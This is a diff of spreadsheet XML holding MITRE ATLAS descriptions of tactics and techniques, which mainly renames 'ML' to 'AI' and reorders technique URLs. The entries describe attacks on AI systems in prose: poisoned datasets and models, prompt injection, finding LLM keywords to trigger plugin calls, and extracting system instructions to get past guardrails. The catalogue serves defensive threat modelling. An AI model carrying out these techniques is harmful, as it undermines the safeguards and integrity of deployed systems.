+Adversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019), malicious models ([Publish Poisoned Models](/techniques/AML.T0058)), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).</t>
+  </si>
+  <si>
     <t>Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to.</t>
   </si>
   <si>
     <t>Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails.</t>
   </si>
   <si>
-    <t xml:space="preserve">Research labs at academic institutions and Company R&amp;D divisions often have blogs that highlight their use of machine learning and its application to the organizations unique problems.
+    <t>Research labs at academic institutions and Company R&amp;D divisions often have blogs that highlight their use of artificial intelligence and its application to the organizations unique problems.
 Individual researchers also frequently document their work in blogposts.
 An adversary may search for posts made by the target victim organization or its employees.
-In comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the machine learning system.
+In comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the AI system.
 This could include underlying technologies and frameworks used, and possibly some information about the API access and use case.
-This will help the adversary better understand how that organization is using machine learning internally and the details of their approach that could aid in tailoring an attack.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Proxy models may be trained from ML artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary.
-This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.
-</t>
+This will help the adversary better understand how that organization is using AI internally and the details of their approach that could aid in tailoring an attack.</t>
+  </si>
+  <si>
+    <t>Proxy models may be trained from AI artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary.
+This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may replicate a private model.
 By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
 The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
 A replicated model that closely mimic's the target model is a valuable resource in staging the attack.
-The adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade ML Model](/techniques/AML.T0015), [Spamming ML System with Chaff Data](/techniques/AML.T0046)).
+The adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade AI Model](/techniques/AML.T0015), [Spamming AI System with Chaff Data](/techniques/AML.T0046)).
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may develop unsafe ML artifacts that when executed have a deleterious effect.
+    <t>Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect.
 The adversary can use this technique to establish persistent access to systems.
-These models may be introduced via a [ML Supply Chain Compromise](/techniques/AML.T0010).
+These models may be introduced via a [AI Supply Chain Compromise](/techniques/AML.T0010).
 Serialization of models is a popular technique for model storage, transfer, and loading.
-However, this format without proper checking presents an opportunity for code execution.
-</t>
+However, this format without proper checking presents an opportunity for code execution.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may search compromised systems to find and obtain insecurely stored credentials.
@@ -1548,7 +1667,7 @@
   </si>
   <si>
     <t xml:space="preserve">An adversary may rely upon specific actions by a user in order to gain execution.
-Users may inadvertently execute unsafe code introduced via [ML Supply Chain Compromise](/techniques/AML.T0010).
+Users may inadvertently execute unsafe code introduced via [AI Supply Chain Compromise](/techniques/AML.T0010).
 Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.
 </t>
   </si>
@@ -1557,11 +1676,10 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
-Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various ML resources and services.
-Compromised credentials may provide access to additional ML artifacts and allow the adversary to perform [Discover ML Artifacts](/techniques/AML.T0007).
-Compromised credentials may also grant an adversary increased privileges such as write access to ML artifacts used during development or production.
-</t>
+    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
+Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various AI resources and services.
+Compromised credentials may provide access to additional AI artifacts and allow the adversary to perform [Discover AI Artifacts](/techniques/AML.T0007).
+Compromised credentials may also grant an adversary increased privileges such as write access to AI artifacts used during development or production.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model.
@@ -1577,9 +1695,27 @@
 </t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0035</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0008.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0048.004</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0040</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0010.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0010</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0047</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0008</t>
   </si>
   <si>
@@ -1595,195 +1731,201 @@
     <t>https://atlas.mitre.org/techniques/AML.T0017.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0043.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0043.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0067.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0075</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0050</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0008.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0010.004</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0076</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0034</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0043</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0005</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0010.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0036</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0037</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0002.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0029</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0017</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0051.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0007</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0014</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0013</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0063</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0062</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0069</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0008.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0078</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0018.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0031</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0059</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0021</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0015</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0024</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0025</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0049</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0048</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0024.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0056</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0071</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0048.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0044</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0064</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0010.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0073</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0051.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0024.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0043.004</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0024.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0000.000</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0057</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0054</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0053</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0065</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0051</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0068</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0061</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0077</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0067</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0011.001</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0018</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0043.001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0043.002</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0067.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0050</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0008.001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0034</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0043</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0005</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0010.002</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0036</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0037</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0002.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0029</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0017</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0051.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0063</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0062</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0069</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0007</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0014</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0013</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0008.002</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0059</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0031</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0021</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0015</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0025</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0024</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0049</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0048</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0056</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0024.002</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0071</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0048.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0044</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0064</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0010.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0051.001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0024.000</t>
+    <t>https://atlas.mitre.org/techniques/AML.T0043.003</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0074</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0010.003</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0002.001</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/techniques/AML.T0018.001</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0043.004</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0024.001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0000.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0057</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0054</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0053</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0065</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0051</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0068</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0061</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0067</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0035</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0008.000</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0048.004</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0010.001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0010</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0047</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0011.001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0043.003</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0010.003</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0002.001</t>
-  </si>
-  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0016</t>
   </si>
   <si>
@@ -1823,16 +1965,22 @@
     <t>https://atlas.mitre.org/techniques/AML.T0066</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0072</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0004</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0000</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0003</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0000</t>
+    <t>https://atlas.mitre.org/techniques/AML.T0008.004</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/techniques/AML.T0048.002</t>
@@ -1850,6 +1998,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0069.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0079</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0069.001</t>
   </si>
   <si>
@@ -1889,42 +2040,39 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>14 March 2025</t>
-  </si>
-  <si>
-    <t>ML Model Access</t>
+    <t>22 April 2025</t>
+  </si>
+  <si>
+    <t>Collection</t>
   </si>
   <si>
     <t>Resource Development</t>
   </si>
   <si>
+    <t>Impact</t>
+  </si>
+  <si>
+    <t>AI Model Access</t>
+  </si>
+  <si>
+    <t>Initial Access</t>
+  </si>
+  <si>
     <t>Reconnaissance</t>
   </si>
   <si>
-    <t>ML Attack Staging, Persistence</t>
-  </si>
-  <si>
-    <t>ML Attack Staging</t>
+    <t>AI Attack Staging</t>
   </si>
   <si>
     <t>Defense Evasion</t>
   </si>
   <si>
+    <t>Discovery</t>
+  </si>
+  <si>
     <t>Execution</t>
   </si>
   <si>
-    <t>Impact</t>
-  </si>
-  <si>
-    <t>Initial Access</t>
-  </si>
-  <si>
-    <t>Collection</t>
-  </si>
-  <si>
-    <t>Discovery</t>
-  </si>
-  <si>
     <t>Defense Evasion, Impact, Initial Access</t>
   </si>
   <si>
@@ -1940,18 +2088,33 @@
     <t>Persistence</t>
   </si>
   <si>
+    <t>AI Attack Staging, Persistence</t>
+  </si>
+  <si>
     <t>Persistence, Resource Development</t>
   </si>
   <si>
+    <t>Command and Control</t>
+  </si>
+  <si>
     <t>Credential Access</t>
   </si>
   <si>
     <t>ATLAS</t>
   </si>
   <si>
+    <t>AML.TA0001</t>
+  </si>
+  <si>
+    <t>AML.TA0000</t>
+  </si>
+  <si>
     <t>AML.TA0009</t>
   </si>
   <si>
+    <t>AML.TA0014</t>
+  </si>
+  <si>
     <t>AML.TA0013</t>
   </si>
   <si>
@@ -1973,12 +2136,6 @@
     <t>AML.TA0004</t>
   </si>
   <si>
-    <t>AML.TA0001</t>
-  </si>
-  <si>
-    <t>AML.TA0000</t>
-  </si>
-  <si>
     <t>AML.TA0006</t>
   </si>
   <si>
@@ -1991,56 +2148,76 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--b08d83b4-fdc7-4e5f-93ef-f4479a2f2a14</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--a467ab89-8c73-46bf-964a-9aa30822c85d</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--a24a9db4-eb43-4017-95ae-36e4157cec6a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--46dee8aa-a49e-4177-8364-8cba270649e8</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--4d802237-5f91-441b-bbd7-948b1eabbf6b</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--deb1ca66-52d8-4ba9-b48d-eae1182e45b5</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--72baacdb-3212-4cce-9785-9c068f2f3fd3</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c2ff12db-196b-4c2c-b05d-20f5423fe4f5</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--5ff2c742-46ae-42ef-9d7b-0c1d76841197</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--55db50f4-add2-4407-a20c-dc968ac3189d</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--cb60f8f6-55cd-4ab3-a54e-76c4973c0e9e</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c920f814-50c3-4d9b-b0c9-8a910b29d357</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--3fa0e3a6-3d30-4407-864d-7975b4feda3c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--56f79b50-5220-4170-bcbe-d07be1f8c8b5</t>
+    <t>x-mitre-tactic--388330a4-f142-4895-935c-0fc615225df0</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--07adc703-b1fb-473f-a9e6-ef4fd6a58442</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--af4c8070-9618-4da2-bfec-2cc253f41ae3</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--b370966c-00c6-4b7c-948b-9e1b805bc6da</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--398fa5a9-194c-483e-82d6-9a6b57e3eefc</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c9cf0175-296e-4439-852d-afb870ed5e0c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d57d4782-2e85-447d-91a8-0cb8123a4f21</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--1f442889-a32d-4355-b079-54dfaa6564ca</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--cbc44930-843c-41be-b07a-93234ce861c0</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--6086655a-a9dc-4962-87ef-ca7eef261820</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--30a41790-7c46-4913-a7ff-38fadd67c15e</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--fe06fd86-737a-412a-abfd-4b6f38c264d5</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d900d1a1-0715-4f22-92a0-cf292a2761e4</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8ed07aa0-b2fb-4267-ad98-84da4669dcec</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--fbc5143a-9d65-44dd-8ff6-1fde80208cf3</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
   </si>
   <si>
-    <t xml:space="preserve">The adversary is trying to gather machine learning artifacts and other related information relevant to their goal.
+    <t>The adversary is leveraging their knowledge of and access to the target system to tailor the attack.
+AI Attack Staging consists of techniques adversaries use to prepare their attack on the target AI model.
+Techniques can include training proxy models, poisoning the target model, and crafting adversarial data to feed the target model.
+Some of these techniques can be performed in an offline manner and are thus difficult to mitigate.
+These techniques are often used to achieve the adversary's end goal.</t>
+  </si>
+  <si>
+    <t>The adversary is attempting to gain some level of access to an AI model.
+AI Model Access enables techniques that use various types of access to the AI model that can be used by the adversary to gain information, develop attacks, and as a means to input data to the model.
+The level of access can range from the full knowledge of the internals of the model to access to the physical environment where data is collected for use in the AI model.
+The adversary may use varying levels of model access during the course of their attack, from staging the attack to impacting the target system.
+Access to an AI model may require access to the system housing the model, the model may be publically accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes AI as part of its processes.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to gather AI artifacts and other related information relevant to their goal.
 Collection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives.
-Frequently, the next goal after collecting data is to steal (exfiltrate) the ML artifacts, or use the collected information to stage future operations.
-Common target sources include software repositories, container registries, model repositories, and object stores.
-</t>
+Frequently, the next goal after collecting data is to steal (exfiltrate) the AI artifacts, or use the collected information to stage future operations.
+Common target sources include software repositories, container registries, model repositories, and object stores.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to communicate with compromised AI systems to control them.
+Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim's network structure and defenses.</t>
   </si>
   <si>
     <t xml:space="preserve">The adversary is trying to steal account names and passwords.
@@ -2048,69 +2225,46 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">The adversary is trying to avoid being detected by machine learning-enabled security software.
+    <t>The adversary is trying to avoid being detected by AI-enabled security software.
 Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.
-Techniques used for defense evasion include evading ML-enabled security software such as malware detectors.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to figure out your machine learning environment.
+Techniques used for defense evasion include evading AI-enabled security software such as malware detectors.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to figure out your AI environment.
 Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network.
 These techniques help adversaries observe the environment and orient themselves before deciding how to act.
 They also allow adversaries to explore what they can control and what's around their entry point in order to discover how it could benefit their current objective.
-Native operating system tools are often used toward this post-compromise information-gathering objective.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to run malicious code embedded in machine learning artifacts or software.
+Native operating system tools are often used toward this post-compromise information-gathering objective.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to run malicious code embedded in AI artifacts or software.
 Execution consists of techniques that result in adversary-controlled code running on a local or remote system.
 Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.
-For example, an adversary might use a remote access tool to run a PowerShell script that does [Remote System Discovery](https://attack.mitre.org/techniques/T1018/).
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to steal machine learning artifacts or other information about the machine learning system.
+For example, an adversary might use a remote access tool to run a PowerShell script that does [Remote System Discovery](https://attack.mitre.org/techniques/T1018/).</t>
+  </si>
+  <si>
+    <t>The adversary is trying to steal AI artifacts or other information about the AI system.
 Exfiltration consists of techniques that adversaries may use to steal data from your network.
 Data may be stolen for its valuable intellectual property, or for use in staging future operations.
-Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to manipulate, interrupt, erode confidence in, or destroy your machine learning systems and data.
+Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to manipulate, interrupt, erode confidence in, or destroy your AI systems and data.
 Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.
 Techniques used for impact can include destroying or tampering with data.
 In some cases, business processes can look fine, but may have been altered to benefit the adversaries' goals.
-These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to gain access to the machine learning system.
+These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to gain access to the AI system.
 The target system could be a network, mobile device, or an edge device such as a sensor platform.
-The machine learning capabilities used by the system could be local with onboard or cloud-enabled ML capabilities.
-Initial Access consists of techniques that use various entry vectors to gain their initial foothold within the system.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is leveraging their knowledge of and access to the target system to tailor the attack.
-ML Attack Staging consists of techniques adversaries use to prepare their attack on the target ML model.
-Techniques can include training proxy models, poisoning the target model, and crafting adversarial data to feed the target model.
-Some of these techniques can be performed in an offline manner and are thus difficult to mitigate.
-These techniques are often used to achieve the adversary's end goal.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is attempting to gain some level of access to a machine learning model.
-ML Model Access enables techniques that use various types of access to the machine learning model that can be used by the adversary to gain information, develop attacks, and as a means to input data to the model.
-The level of access can range from the full knowledge of the internals of the model to access to the physical environment where data is collected for use in the machine learning model.
-The adversary may use varying levels of model access during the course of their attack, from staging the attack to impacting the target system.
-Access to an ML model may require access to the system housing the model, the model may be publically accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes ML as part of its processes.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to maintain their foothold via machine learning artifacts or software.
+The AI capabilities used by the system could be local with onboard or cloud-enabled AI capabilities.
+Initial Access consists of techniques that use various entry vectors to gain their initial foothold within the system.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to maintain their foothold via AI artifacts or software.
 Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
-Techniques used for persistence often involve leaving behind modified ML artifacts such as poisoned training data or backdoored ML models.
-</t>
+Techniques used for persistence often involve leaving behind modified ML artifacts such as poisoned training data or manipulated AI models.</t>
   </si>
   <si>
     <t xml:space="preserve">The adversary is trying to gain higher-level permissions.
@@ -2123,24 +2277,31 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">The adversary is trying to gather information about the machine learning system they can use to plan future operations.
+    <t>The adversary is trying to gather information about the AI system they can use to plan future operations.
 Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.
